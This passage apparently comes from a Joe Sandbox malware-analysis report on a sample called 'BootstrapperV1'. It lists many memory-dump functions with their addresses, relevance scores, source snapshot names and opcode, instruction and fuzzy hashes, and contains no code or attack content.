                                                                                                                                                        • Opcode Fuzzy Hash: 359088f63e61f07a318b290158688763f0e5af58f4339e50118a780543f920d0
                                                                                                                                                        • Instruction Fuzzy Hash: 72115171D19A5A8EF799DB28C8857E8B3A5EF55301F1040F9E44DD21A3DE399981CB80
                                                                                                                                                        Function 00007FFAAC5AABB1 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9ebd7730d39effc33defbcf3daf2c03b3a50ded450aad9d00a77a209d8d0c10
                                                                                                                                                        • Instruction ID: bfc06cf44f03f2e27651747a4f821c59295ec80f778e01cc0ff5cbb62d538600
                                                                                                                                                        • Opcode Fuzzy Hash: e9ebd7730d39effc33defbcf3daf2c03b3a50ded450aad9d00a77a209d8d0c10
                                                                                                                                                        • Instruction Fuzzy Hash: E8F0CD51A4EA8B5FF355426D58992B45B85D75912170881F7E04CC6197DC4DCC4B43E2
                                                                                                                                                        Function 00007FFAAC595D33 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a38cb1dd3e4203494a49203c360fbbe142a19b9f463f7ac2d7cb9f2adec452b0
                                                                                                                                                        • Instruction ID: baaf71e09e3b36cc57259f7fd58c7fb5d08e44bf8ad2587983a5b0069cf8d5d0
                                                                                                                                                        • Opcode Fuzzy Hash: a38cb1dd3e4203494a49203c360fbbe142a19b9f463f7ac2d7cb9f2adec452b0
                                                                                                                                                        • Instruction Fuzzy Hash: 21F02811B4DF0F0FFBC4AB7C280867861C1DB88221B80C1BBE40EC21A7EC1DD84602C4
                                                                                                                                                        Function 00007FFAAC59D79D Relevance: .1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c23ed38e7e8ab09f6295cafc1aa6d5d753b686e572530eb53490dfc2a40495c8
                                                                                                                                                        • Instruction ID: 70b1905ba9611a29eb0a1a56cb9851a257dd21af4135f9ba32c02d2a260f3979
                                                                                                                                                        • Opcode Fuzzy Hash: c23ed38e7e8ab09f6295cafc1aa6d5d753b686e572530eb53490dfc2a40495c8
                                                                                                                                                        • Instruction Fuzzy Hash: B0012611A0EECA8BF75AA33C14502B56FE1DF97225B0446FAD0CEC60D3DD0EA44A8381
                                                                                                                                                        Function 00007FFAAC590862 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fb8febf008064af340e002c21f20561d34ed336dc3cce4b6f2c7b3b4b0ba8855
                                                                                                                                                        • Instruction ID: ee766cd0b3f2331b6a325c53636caabb7d16a9e2bd3b313210827268a4080c0a
                                                                                                                                                        • Opcode Fuzzy Hash: fb8febf008064af340e002c21f20561d34ed336dc3cce4b6f2c7b3b4b0ba8855
                                                                                                                                                        • Instruction Fuzzy Hash: AE01D26160EBC99FE35697B448252A57BE0FF96310F0805EB905CD7193DD6C880CC392
                                                                                                                                                        Function 00007FFAAC595A80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fcbd30c6c88069605a8ec4039c7abf714dd6e7888d285105dc60d4e183566e55
                                                                                                                                                        • Instruction ID: e486720ad9205649032d7f39feb5bb882517572797369d5954ebea86c828e98a
                                                                                                                                                        • Opcode Fuzzy Hash: fcbd30c6c88069605a8ec4039c7abf714dd6e7888d285105dc60d4e183566e55
                                                                                                                                                        • Instruction Fuzzy Hash: AB01FE21A59E0B4FDA98E72C9450576B3E5FFA9304744C5B9D00EC3245DE19DC4683C1
                                                                                                                                                        Function 00007FFAAC594D51 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: eefec06e03274243fccfe41b133a0488c2401da55b83c58d3c1586619f50989f
                                                                                                                                                        • Instruction ID: afa494cce0569c7d332660fa2f4e0ba706e5f1a57fcb33747f76af50412abaa8
                                                                                                                                                        • Opcode Fuzzy Hash: eefec06e03274243fccfe41b133a0488c2401da55b83c58d3c1586619f50989f
                                                                                                                                                        • Instruction Fuzzy Hash: EF01493185E2CA9FE701DB7488584F57FF4EF42200B0440EAE04CC7162DE1D59088392
                                                                                                                                                        Function 00007FFAAC594B4D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d08e4224c00f4a5b5d343c8092d4978d800962a78dcfb8d1201b05facd6d3aec
                                                                                                                                                        • Instruction ID: 47601231fd2830c4b309feb21da50d2ad59c4c29315de85036151886b124a197
                                                                                                                                                        • Opcode Fuzzy Hash: d08e4224c00f4a5b5d343c8092d4978d800962a78dcfb8d1201b05facd6d3aec
                                                                                                                                                        • Instruction Fuzzy Hash: 3801811589FAC79EEB63537828202A16FA99E4312470D41E7F0CCCB087DE0D9C59C3D6
                                                                                                                                                        Function 00007FFAAC594CF5 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 612f3edcd1296fe7bb8bc7dc1d4eb5aded6651c64b5b675f4699021ca139c3bc
                                                                                                                                                        • Instruction ID: 992306e92e73db208d6c9f79e722fa11aa9f16701542e1e03138ac68e4367dea
                                                                                                                                                        • Opcode Fuzzy Hash: 612f3edcd1296fe7bb8bc7dc1d4eb5aded6651c64b5b675f4699021ca139c3bc
                                                                                                                                                        • Instruction Fuzzy Hash: D7F0BE42E4FE9B0FE696936C28641B42B91EB9612074902F7E44CCB19ADE4E8D4A03D2
                                                                                                                                                        Function 00007FFAAC597D50 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d7b15803618bdb6e2cf3706307403d173f304ff4bbddb05ceac6edea17d7719b
                                                                                                                                                        • Instruction ID: 0ed69bbb28db5ce41911b9a03d47bd97082d355c57b930a38f468a256885778b
                                                                                                                                                        • Opcode Fuzzy Hash: d7b15803618bdb6e2cf3706307403d173f304ff4bbddb05ceac6edea17d7719b
                                                                                                                                                        • Instruction Fuzzy Hash: CBF0B431A4980FCEF678920E955D77366D8DB4B2B0F114076F44EC21A2E8489C468290
                                                                                                                                                        Function 00007FFAAC595BE9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2208458ea3337caba51d32b6d2570281306d17c1f4f7547c3f3fabed693642a0
                                                                                                                                                        • Instruction ID: 872a901ccec7e5550ae98b9d9ad30c6d12673bb626dc49804f0f42616203b91a
                                                                                                                                                        • Opcode Fuzzy Hash: 2208458ea3337caba51d32b6d2570281306d17c1f4f7547c3f3fabed693642a0
                                                                                                                                                        • Instruction Fuzzy Hash: 0801AD7081878E8FDB46EF2888140BA7FF0FF56200B4005EBE419C61A2DE7945148381
                                                                                                                                                        Function 00007FFAAC596FF2 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 62c63945a5d2e9bb5b4fde0242ae6ea8ee5af2c8dc215b8311a09489223fd010
                                                                                                                                                        • Instruction ID: 0b5ff59c6396bbf2d82b74a9ace4e661eb0379eba9d6c856220523d863b10e43
                                                                                                                                                        • Opcode Fuzzy Hash: 62c63945a5d2e9bb5b4fde0242ae6ea8ee5af2c8dc215b8311a09489223fd010
                                                                                                                                                        • Instruction Fuzzy Hash: BDF0F660758D0B8FEA88EB28D440DB573D5FF943407508575D00FC3185DD28E8464780
                                                                                                                                                        Function 00007FFAAC5A6413 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6dada96357b2b12311360f90bbe880902a4907852e00db6f248d02fcd0e128b1
                                                                                                                                                        • Instruction ID: 18f6ac1e8f0ce889621f93b660d574a19af31edc9f0062c341336bf3e3c17169
                                                                                                                                                        • Opcode Fuzzy Hash: 6dada96357b2b12311360f90bbe880902a4907852e00db6f248d02fcd0e128b1
                                                                                                                                                        • Instruction Fuzzy Hash: D8F0FE71A6CB088B9F44AF4CBC434AD77D0FB99B60F10116FF94943251D621F8968AC7
                                                                                                                                                        Function 00007FFAAC5ABE9B Relevance: .0, Instructions: 40COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: aa68fdef3fae00141618e6784d6d534a48af09598541584514b03e04e8ff38ce
                                                                                                                                                        • Instruction ID: 2c8377f4d7250b496702eb52d73a26ff5c46de064b127a10826b3c9b03509247
                                                                                                                                                        • Opcode Fuzzy Hash: aa68fdef3fae00141618e6784d6d534a48af09598541584514b03e04e8ff38ce
                                                                                                                                                        • Instruction Fuzzy Hash: A9F0377275D61D8FB148AB1C64031B973C6DB8A960B1081AFE48FC3247DD15A90B47D5
                                                                                                                                                        Function 00007FFAAC59B902 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2ec6d8332cd559b4c4a249c1beab5c9575af8f3aa59987c33e016e7253bdbf75
                                                                                                                                                        • Instruction ID: 4e36d6b5a8766b4a055a5fdd727af2262a0bc4ad1b2277063c92e700ae9dc00f
                                                                                                                                                        • Opcode Fuzzy Hash: 2ec6d8332cd559b4c4a249c1beab5c9575af8f3aa59987c33e016e7253bdbf75
                                                                                                                                                        • Instruction Fuzzy Hash: EDF0C82045EACB4FF316973894545A17BE4AF47310B4D45F6E48CCB293DA1DE8898791
                                                                                                                                                        Function 00007FFAAC598AE8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 13f62b51865d5e37914c5c3fa70c3395a2f313d71ec6588268fc32fdebbf12c0
                                                                                                                                                        • Instruction ID: 5df2c4be939d7aba554a17f946c2817638b0326823847d0d10aa70970b3c6891
                                                                                                                                                        • Opcode Fuzzy Hash: 13f62b51865d5e37914c5c3fa70c3395a2f313d71ec6588268fc32fdebbf12c0
                                                                                                                                                        • Instruction Fuzzy Hash: 13F0EC21759D0E4BE558A32C54457BD62D5DB96311F4046BAE40EC3285DD5EE84A43C1
                                                                                                                                                        Function 00007FFAAC59DF92 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a6ba270d170d36dbacb7eda4adcfdb6475d2e79544dee6c399c68d403a0ca7d1
                                                                                                                                                        • Instruction ID: c92bd32c4b4af78f2e478298ad2758b9e4d1cf626a1dc9a7cb157c5cbbd951ec
                                                                                                                                                        • Opcode Fuzzy Hash: a6ba270d170d36dbacb7eda4adcfdb6475d2e79544dee6c399c68d403a0ca7d1
                                                                                                                                                        • Instruction Fuzzy Hash: 3DF0CD8090E3C10FF70797B8082A2A6BFE19F57220B4D84EAD0C8CF093E51D844E8352
                                                                                                                                                        Function 00007FFAAC5908DD Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a7c43fb8982f11d1c945227b6eb22ffde140f13e7e11340ba26b439f99dbe245
                                                                                                                                                        • Instruction ID: b8b8e5bc706dce0dbbeb2d5eb220bb9252ce915e9d1bd190f2aa86ff64242067
                                                                                                                                                        • Opcode Fuzzy Hash: a7c43fb8982f11d1c945227b6eb22ffde140f13e7e11340ba26b439f99dbe245
                                                                                                                                                        • Instruction Fuzzy Hash: CDF0B470E4E68B8FF340ABF900061AABBE0DF9A2A074105FED04DC7296C91D484A4780
                                                                                                                                                        Function 00007FFAAC5951FE Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 653da305b3a38a7e77e97b22f5dc9f57a0e9ad280d3195d865991233d9cbc362
                                                                                                                                                        • Instruction ID: ad5a32ebdb3f72a8012ffb9a520014d42b26ff08642b4ff195c3ed4ee45f109b
                                                                                                                                                        • Opcode Fuzzy Hash: 653da305b3a38a7e77e97b22f5dc9f57a0e9ad280d3195d865991233d9cbc362
                                                                                                                                                        • Instruction Fuzzy Hash: 5AF0595165E98B4FEF48E32868819B867C1DF5020070484FDD00EC719BCD29D94E8382
                                                                                                                                                        Function 00007FFAAC5904C0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a5b44bfe0fd1ef53c489d1c70acb6e0507cf327a15287e60ca4d3b1489cb10ed
                                                                                                                                                        • Instruction ID: 2e82b17f8d16199f361ea2b9b891ab7b931418e122c8ff9b6ef681d10769b709
                                                                                                                                                        • Opcode Fuzzy Hash: a5b44bfe0fd1ef53c489d1c70acb6e0507cf327a15287e60ca4d3b1489cb10ed
                                                                                                                                                        • Instruction Fuzzy Hash: 1BE02213A4D42A0AFA6472BCF4603F833408F0A328F0881B3E08CC51D3DC491C4502C1
                                                                                                                                                        Function 00007FFAAC5992C5 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c85c7fbae1f8e7908c714170d9b63718d7f9e673828d75f5cf91c394a5063c02
                                                                                                                                                        • Instruction ID: 24ae8b85fad144d2c6d9a6c38743ee4c2ff26052e32e9c59351bf0a7c9028b99
                                                                                                                                                        • Opcode Fuzzy Hash: c85c7fbae1f8e7908c714170d9b63718d7f9e673828d75f5cf91c394a5063c02
                                                                                                                                                        • Instruction Fuzzy Hash: 7FE02BA280E3C28FF755572548471A93FC0BF66210F4C82FAE08CCA0D3EA1DD54D4282
                                                                                                                                                        Function 00007FFAAC591614 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 53e4164ed3f96535489f8e77e17bbc113441cbf57508d02efeba15acb5522ce5
                                                                                                                                                        • Instruction ID: b84cd429a74ed6f207b5173f091cc94b7ec3d46b858d1a3ec1fb76384fa58df0
                                                                                                                                                        • Opcode Fuzzy Hash: 53e4164ed3f96535489f8e77e17bbc113441cbf57508d02efeba15acb5522ce5
                                                                                                                                                        • Instruction Fuzzy Hash: BCE07D3191CE8C4BDF40A6D8E8018D6BFA4FBC9308F04009AF44CC3181D222D5118391
                                                                                                                                                        Function 00007FFAAC5904C8 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: da4e49382190e7ee972728023d059b7270e43d4182782753eb9d4b6ea417441d
                                                                                                                                                        • Instruction ID: d507cb0fb4a72ace7c22df0943330d84a03a99ea5da431038c92d98613641c23
                                                                                                                                                        • Opcode Fuzzy Hash: da4e49382190e7ee972728023d059b7270e43d4182782753eb9d4b6ea417441d
                                                                                                                                                        • Instruction Fuzzy Hash: 2AE0861399D42A46FA6472BCF4657F962848F0E324F5481B3E44DD51C7DC492C8512D5
                                                                                                                                                        Function 00007FFAAC5945A0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 268917b41e27be6c4f0e3045a420815ac4878b972886af12583acdbddb3289f8
                                                                                                                                                        • Instruction ID: f16a8ac362ae958baafd07235815f60a17a1f39d34fd621a1dd9cfc9279f7999
                                                                                                                                                        • Opcode Fuzzy Hash: 268917b41e27be6c4f0e3045a420815ac4878b972886af12583acdbddb3289f8
                                                                                                                                                        • Instruction Fuzzy Hash: 4FE04F61A1A92A8FE9A4DB9C544866467D1EF09B40745C0E6A04DC7195CA109C0C43C2
                                                                                                                                                        Function 00007FFAAC5A5381 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c22214349aba8a2af8fac0b57b92db312700bc1ce3a8325770904d24a18c2f4d
                                                                                                                                                        • Instruction ID: 46266b0f360aa2ccd6a4217832eca08adf825029e1cbf7de80eb2a216269f59a
                                                                                                                                                        • Opcode Fuzzy Hash: c22214349aba8a2af8fac0b57b92db312700bc1ce3a8325770904d24a18c2f4d
                                                                                                                                                        • Instruction Fuzzy Hash: E4E0D8326498078FFB18EB0594949F83396DB92320F90C67BE40AC62D4DD5DE84587C0
                                                                                                                                                        Function 00007FFAAC5AF189 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0700042510a266451b3cdb0b14bcd803c5a3a6f86062773c50052ec603e6e573
                                                                                                                                                        • Instruction ID: 8fd6fb3ef67e63d39057da356c4ccc10eb9bab8d05d57b140e7ab58ade1edebe
                                                                                                                                                        • Opcode Fuzzy Hash: 0700042510a266451b3cdb0b14bcd803c5a3a6f86062773c50052ec603e6e573
                                                                                                                                                        • Instruction Fuzzy Hash: 0FE0D85294FBD50FF7A6636998692A47FA09F17210F0900EBD44CCB1D3E88D5C4943D2
                                                                                                                                                        Function 00007FFAAC594260 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                                                                                                                                        • Instruction ID: 8a1f4907109174ced19215a410c7932612d55158b144f6b8c4fe3208135380a4
                                                                                                                                                        • Opcode Fuzzy Hash: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                                                                                                                                        • Instruction Fuzzy Hash: 11D05B11E5FC1F5679B4632C341576900CADBCA620F8543F2F80CC224DDD0DDC4542C1
                                                                                                                                                        Function 00007FFAAC5AFB80 Relevance: .0, Instructions: 25COMMON
